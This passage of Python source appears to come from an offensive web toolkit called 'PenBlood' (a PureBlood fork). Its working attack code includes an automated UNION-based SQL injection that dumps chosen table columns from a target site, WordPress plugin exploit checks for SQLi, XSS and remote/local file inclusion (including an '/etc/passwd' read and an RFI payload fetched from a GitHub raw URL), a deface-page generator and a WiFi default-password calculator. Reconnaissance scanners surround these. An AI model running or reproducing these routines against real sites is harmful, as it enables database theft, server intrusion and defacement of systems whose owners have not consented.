auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
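        # Interactively ask for one table name and any number of column names; an empty answer,
        # "done" or "exit" starts the dump.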
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
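        # For each requested column, substitute it into sqli_dump_column_payload (via its <column>
        # placeholder) and print the de-duplicated values returned in <strong id="PureBloodINFO"> tags.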
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
def auto_xss_injection(self, xi_url):
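        # Placeholder: automatic XSS injection is not implemented yet; this method only prints a blank line.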
print ('')
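    # Probe a handful of publicly documented WordPress plugin issues (WooCommerce directory traversal,
    # WP Booking Calendar 3.0.0 SQLi/XSS, WP with Spritz 1.0 RFI/LFI, Events Calendar 'event_id' SQLi)
    # by requesting their known paths and inspecting the responses.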
def wordpress_vulnerability_check(self, wvc_url):
        print ('[#] - Checking (WordPress Woocommerce - Directory Traversal):')
wp_woocommerce_wvc_url = ''
wp_woocommerce = requests.get(wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain')
wp_woocommerce_wvc_url = wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain'
if wp_woocommerce.status_code == 200:
print ('\t[+] - Vulnerable! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 301:
print ('\t[!] - Redirected! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 403:
print ('\t[!] - Forbidden! ~ ' + wp_woocommerce_wvc_url)
else:
print ('\t[!] - 404 Found! ~ ' + wp_woocommerce_wvc_url)
print ('\n\n[#] - Checking (Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting):')
wp_plugin_booking_calendar_wvc_url = ''
wp_plugin_booking_calendar = requests.get(wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
elif wp_plugin_booking_calendar.status_code == 404:
wp_plugin_booking_calendar = requests.get(wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
else:
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
wp_plugin_booking_calendar = 'Not Found'
if wp_plugin_booking_calendar == 'Not Found':
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
print ('\t[!] - 404 Found! ~ ' + wp_plugin_booking_calendar_wvc_url)
else:
print ('\t[+] - XSS Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=<XSS Payload>')
print ('\t[+] - SQLMap Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=')
            print ('\t[+] - Alerts can\'t be handled without Selenium; confirm the XSS and run SQLMap against this parameter manually')
print ('\n\n[#] - Checking (WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion):')
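        # Note: the published WP with Spritz advisory passes the file/URL to include in the "url" GET
        # parameter of wp.spritz.content.filter.php; the remote test fetches a marker file and the local
        # test requests /etc/passwd.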
wp_plugin_wp_spritz_wvc_url = ''
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php')
if wp_plugin_wp_spritz.status_code == 200:
            wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt')
            wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt'
            if 'PureBlood RFI ~Cr4sHCoD3' in wp_plugin_wp_spritz.text:
                print ('\t[+] - Vulnerable! ~ ' + wp_plugin_wp_spritz_wvc_url)
                wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/passwd')
                if wp_plugin_wp_spritz.status_code == 403 or wp_plugin_wp_spritz.status_code == 400:
                    print ('\t[+] - Try to bypass LFI! ~ ' + wp_plugin_wp_spritz_wvc_url)
                elif 'The page you are trying to access is restricted due to a security rule.' in wp_plugin_wp_spritz.text:
                    print ('\t[+] - Try to bypass LFI! ~ ' + wp_plugin_wp_spritz_wvc_url)
elif wp_plugin_wp_spritz.status_code == 404:
wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php'
print ('\t[!] - 404 Found! ~ ' + wp_plugin_wp_spritz_wvc_url)
print ('\n\n[#] - Checking (WordPress Plugin Events Calendar - \'event_id\' SQL Injection):')
wp_plugin_events_calendar_wvc_url = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1')
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1'
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
print ('\t[!] - 404 Found! ~ ' + wp_plugin_events_calendar_wvc_url)
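# Reconnaissance helpers: most lookups are plain HTTP requests (several go through the
# api.hackertarget.com endpoints), plus wordlist-driven admin panel / subdomain / directory / file scans
# and optional Shodan queries.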
class WebPentest:
def banner_grab(self, bg_url):
try:
banner_grab_request = requests.get(bg_url)
banner_grab_result = banner_grab_request.headers
banner_grab_result = str(banner_grab_result).replace("{'", "").replace("'}", "").replace("': '", ": ").replace("', '", ",\n")
self.banner_grab_result = banner_grab_result
return self.banner_grab_result
except:
print("Could not grab a banner info")
def whois(self, w_url):
try:
whois_query = whois.whois(w_url)
self.whois_result = whois_query
return self.whois_result
except:
print("Could not find perform whois")
def traceroute(self, t_hostname):
try:
traceroute_request = requests.get('https://api.hackertarget.com/mtr/?q=' + t_hostname)
traceroute_response = traceroute_request.text
traceroute_final = """{0}""".format(str(traceroute_response))
self.traceroute_result = traceroute_final
return self.traceroute_result
except:
print("Could not perform traceroute")
def dns_record(self, dr_hostname):
try:
dns_record_list = []
for i in ids:
t = threading.Thread(target=dns_record_scanner, args=(dr_hostname, i, dns_record_list, ))
t.start()
t.join()
self.dns_record_result = dns_record_list
return self.dns_record_result
except:
print("Could not find DNS record")
def reverse_dns_lookup(self, rdl_ip):
try:
rdl_ip = rdl_ip + '/24'
reverse_dns_lookup_request = requests.get('https://api.hackertarget.com/reversedns/?q=' + rdl_ip)
reverse_dns_lookup_response = reverse_dns_lookup_request.text
reverse_dns_lookup_final = """{0}""".format(str(reverse_dns_lookup_response))
self.reverse_ip_lookup_result = reverse_dns_lookup_final
return self.reverse_ip_lookup_result
except:
print("Could not perform dns reverse lookup")
def zone_transfer_lookup(self, ztl_hostname):
try:
zone_transfer_lookup_request = requests.get('https://api.hackertarget.com/zonetransfer/?q=' + ztl_hostname)
zone_transfer_lookup_response = zone_transfer_lookup_request.text
zone_transfer_lookup_final = """{0}""".format(str(zone_transfer_lookup_response))
self.zone_transfer_lookup_result = zone_transfer_lookup_final
return self.zone_transfer_lookup_result
except:
print("Could not perform zone transfer lookup")
def port_scan(self, ps_hostname, ps_pend): #https://stackoverflow.com/a/38210023
port_scan_list = []
threads = []
output = {}
delay = 10
for i in range(ps_pend + 1):
t = threading.Thread(target=TCP_connect, args=(ps_hostname, i, delay, output))
threads.append(t)
for i in range(ps_pend + 1):
threads[i].start()
for i in range(ps_pend + 1):
threads[i].join()
for i in range(ps_pend + 1):
if output[i] == 'Open':
port_scan_list.append('[+] Port Open - ' + str(i))
self.port_scan_result = port_scan_list
return self.port_scan_result
def admin_panel_scan(self, ads_url):
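        # Strategy: first harvest Allow/Disallow paths from robots.txt and keep the ones whose pages look
        # like a login form; if nothing is found, fall back to the admin_panel_list wordlist and finally to
        # opening a Google dork in the browser.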
admin_panel_valid = []
admin_panel_redirect = []
ads_urls = []
r_path = []
ads_r_urls = []
robots = ['/robot.txt', '/robots.txt']
for i in admin_panel_list:
ads_urls.append(ads_url + i)
for i in robots:
r_robots = requests.get(ads_url + i)
if r_robots.status_code == 200:
r_robots = r_robots
else:
r_robots = ''
if r_robots == '':
pass
else:
robots = str(r_robots.text)
for i in robots.split("\n"):
if i.startswith('Allow'):
r_path.append(i.split(': ')[1].split(' ')[0])
elif i.startswith('Disallow'):
r_path.append(i.split(': ')[1].split(' ')[0])
for i in r_path:
ads_r_urls.append(ads_url + i)
for i in ads_r_urls:
ads_r_urls_request = requests.get(i)
if 'Admin' in ads_r_urls_request.text or 'Login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'admin' in ads_r_urls_request.text or 'login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'Username' in ads_r_urls_request.text or 'Password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'username' in ads_r_urls_request.text or 'password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
else:
r_admin_panel = None
if not admin_panel_valid:
for i in ads_urls:
admin_scan_request = requests.get(i)
if admin_scan_request.status_code == 200:
admin_panel_valid.append(i)
break
elif admin_scan_request.status_code == 301 or admin_scan_request.status_code == 302:
admin_panel_redirect.append(i)
else:
pass
admin_panel_valid = list(set(admin_panel_valid))
for i in admin_panel_redirect:
admin_panel_valid.append(i + ' - 301')
if not admin_panel_valid:
webbrowser.open_new_tab(google_hacking + 'site:' + ads_url + '+inurl:login | admin | user | cpanel | account | moderator | phpmyadmin | /cp')
self.admin_panel_scan_result = admin_panel_valid
return self.admin_panel_scan_result
def subdomain_scan(self, ss_hostname, subdomain_list):
so_200 = []
so_301 = []
so_302 = []
so_403 = []
ss_urls = []
ss_subdomain_list = open(subdomain_list, 'r')
ss_subdomain_list = ss_subdomain_list.read().splitlines()
for i in ss_subdomain_list:
ss_urls.append(i + '.' + ss_hostname)
for i in ss_urls:
t = threading.Thread(target=subdomain_scanner, args=(i, so_200, so_301, so_302, so_403,))
t.start()
t.join()
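        # NOTE: join() right after start() in the loop above makes the scan effectively sequential; the same
        # pattern is used in dns_record, directory_fuzz and file_fuzz. Collecting the threads and joining
        # after the loop (as port_scan does) would give real concurrency.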
self.ss_200_result = so_200
self.ss_301_result = so_301
self.ss_302_result = so_302
self.ss_403_result = so_403
return self.ss_200_result, self.ss_301_result, self.ss_302_result, self.ss_403_result
def cms_detect(self, cd_hostname):
cd_cms = []
cd_cms_version = []
cms_detect_request = requests.get('https://whatcms.org/?s=' + cd_hostname)
cd_soup = BeautifulSoup(cms_detect_request.content, 'html.parser')
cd_soup_div = cd_soup.find('div', attrs={'class': 'large text-center'})
for i in cd_soup_div.find_all('span', attrs={'class': 'nowrap'}):
cd_cms_version.append(i.text)
cd_cms.append(cd_soup_div.find('a').text)
if not cd_cms:
cms_detect_final = '[!] - There\'s no CMS Detected!'
else:
cd_cms_version = cd_cms_version[1]
cms_detect_final = cd_cms[0].replace('/c/', '')
cms_detect_final = cms_detect_final + ' - ' + cd_cms_version
self.cms_detect_result = cms_detect_final
return self.cms_detect_result
def reverse_ip_lookup(self, ril_hostname):
reverse_ip_lookup_request = requests.get('https://api.hackertarget.com/reverseiplookup/?q=' + ril_hostname)
reverse_ip_lookup_response = reverse_ip_lookup_request.text
reverse_ip_lookup_final = """{0}""".format(str(reverse_ip_lookup_response))
self.reverse_ip_lookup_result = reverse_ip_lookup_final
return self.reverse_ip_lookup_result
def subnet_lookup(self, subnet_input):
subnet_lookup_request = requests.get('https://api.hackertarget.com/subnetcalc/?q=' + subnet_input)
subnet_lookup_response = subnet_lookup_request.text
subnet_lookup_final = """{0}""".format(str(subnet_lookup_response))
self.subnet_lookup_result = subnet_lookup_final
return self.subnet_lookup_result
def links_extract(self, le_url):
links_extract_request = requests.get('https://api.hackertarget.com/pagelinks/?q=' + le_url)
links_extract_response = links_extract_request.text
links_extract_final = """{0}""".format(str(links_extract_response))
self.links_extract_result = links_extract_final
return self.links_extract_result
def directory_fuzz(self, df_url, directory_list):
directory_fuzz_final1 = []
directory_fuzz_final2 = []
directory_fuzz_final3 = []
directory_list_open = open(directory_list, 'r')
directory_list = directory_list_open.read().splitlines()
df_url_list = []
ii = 0
for i in directory_list:
if '/' in directory_list[ii]:
df_url_list.append(df_url + i)
else:
df_url_list.append(df_url + '/' + i)
ii = ii + 1
for i in df_url_list:
print (i)
t = threading.Thread(target=directory_scanner, args=(i, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3))
t.start()
t.join()
self.directory_fuzz_result1 = directory_fuzz_final1
self.directory_fuzz_result2 = directory_fuzz_final2
self.directory_fuzz_result3 = directory_fuzz_final3
        return self.directory_fuzz_result1, self.directory_fuzz_result2, self.directory_fuzz_result3
def file_fuzz(self, ff_url, file_list):
file_fuzz_final1 = []
file_fuzz_final2 = []
file_fuzz_final3 = []
file_list_open = open(file_list, 'r')
file_list = file_list_open.read().splitlines()
ff_url_list = []
for i in file_list:
ff_url_list.append(ff_url + '/' + i)
for i in ff_url_list:
t = threading.Thread(target=file_scanner, args=(i, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3))
t.start()
t.join()
self.file_fuzz_result1 = file_fuzz_final1
self.file_fuzz_result2 = file_fuzz_final2
self.file_fuzz_result3 = file_fuzz_final3
return self.file_fuzz_result1, self.file_fuzz_result2, self.file_fuzz_result3
def shodan_search(self, query, ss_SHODAN_API_KEY):
shodan_api = shodan.Shodan(ss_SHODAN_API_KEY)
try:
shodan_search_results = shodan_api.search(query)
self.shodan_search_result = shodan_search_results
return self.shodan_search_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
def shodan_host_lookup(self, shodan_host, shl_SHODAN_API_KEY):
shodan_api = shodan.Shodan(shl_SHODAN_API_KEY)
try:
shodan_host_lookup_results = shodan_api.host(shodan_host)
self.shodan_host_lookup_result = shodan_host_lookup_results
return self.shodan_host_lookup_result
except shodan.APIError as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
web_pentest()
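# First-run housekeeping: build the outputs/ folder tree and the external/ folder used by the modules above.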
def create_directories():
    for path in ('outputs', 'outputs/generator', 'outputs/web_pentest', 'outputs/web_pentest/shodan', 'outputs/web_application_attack', 'external'):
        if not os.path.exists(path):
            os.mkdir(path)
def clear():
    if platform.system() == 'Windows':
        os.system('cls')
    else:
        os.system('clear')
def banner():
try:
if sys.version_info[0] == 3:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PenHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
██▓███ █ ██ ██▀███ ▓█████ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓██░ ██▒ ██ ▓██▒▓██ ▒ ██▒▓█ ▀ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▓██░ ██▓▒▓██ ▒██░▓██ ░▄█ ▒▒███ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌
▒██▄█▓▒ ▒▓▓█ ░██░▒██▀▀█▄ ▒▓█ ▄ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌
▒██▒ ░ ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓
▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity{3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}penHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
except:
if sys.version_info[0] == 3:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PenHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: LinterexEvilCommunity {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/LinterexEvilCommunity {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PenHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
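# set_target() normalises user input into the global url / hostname / ip values and then returns to the
# menu that asked for it (wfunc 1 = Web Pentest, 2 = Web Application Attack, anything else = main menu).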
def set_target(target, wfunc):
global url
global hostname
global ip
if '=' in target and wfunc != 2:
target = urlparse(target)
if target.scheme == '':
target = ('{0}'.format(target.netloc))
else:
target = ('{0}://{1}'.format(target.scheme, target.netloc))
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
    if target[0] in '123456789':
ip = target
if wfunc == 2:
pass
else:
ip = socket.gethostbyname(hostname)
if wfunc == 1:
web_pentest()
elif wfunc == 2:
web_application_attack()
else:
main()
def generator():
print ("""{3}[ {5}Generator {3}]
{2}01{3}) {5}Deface Page Generator
{2}02{3}) {5}Password Generator
{2}03{3}) {5}PLDT WiFi Password Calculator
{2}04{3}) {5}Text To Hash
{2}90{3}) {5}Back To Menu
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
cgenerator = Generator()
if choice == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
if sys.version_info[0] == 3:
title = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
deface_page_output_filename = str(input('{0}PenBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
title = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
            deface_page_output_filename = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
gdeface_page = cgenerator.deface_page(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups)
if '.html' in deface_page_output_filename:
deface_page_output_filename = deface_page_output_filename
else:
deface_page_output_filename = deface_page_output_filename + '.html'
deface_page_output_file = open('outputs/generator/' + deface_page_output_filename, 'w+')
deface_page_output_file.write(gdeface_page)
deface_page_output_file.close()
        print ('\nOutput saved in outputs/generator/' + deface_page_output_filename)
print (reset + bold)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 2:
if sys.version_info[0] == 3:
length = int(input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
length = int(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(raw_input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gpassword_generator1, gpassword_generator2, gpassword_generator3 = cgenerator.password_generator(length, text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('Random Password: ' + gpassword_generator1)
print ('MD5: ' + gpassword_generator2)
print ('L33T: ' + gpassword_generator3)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 3:
if sys.version_info[0] == 3:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
            digit5 = str(input('{0}PenBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
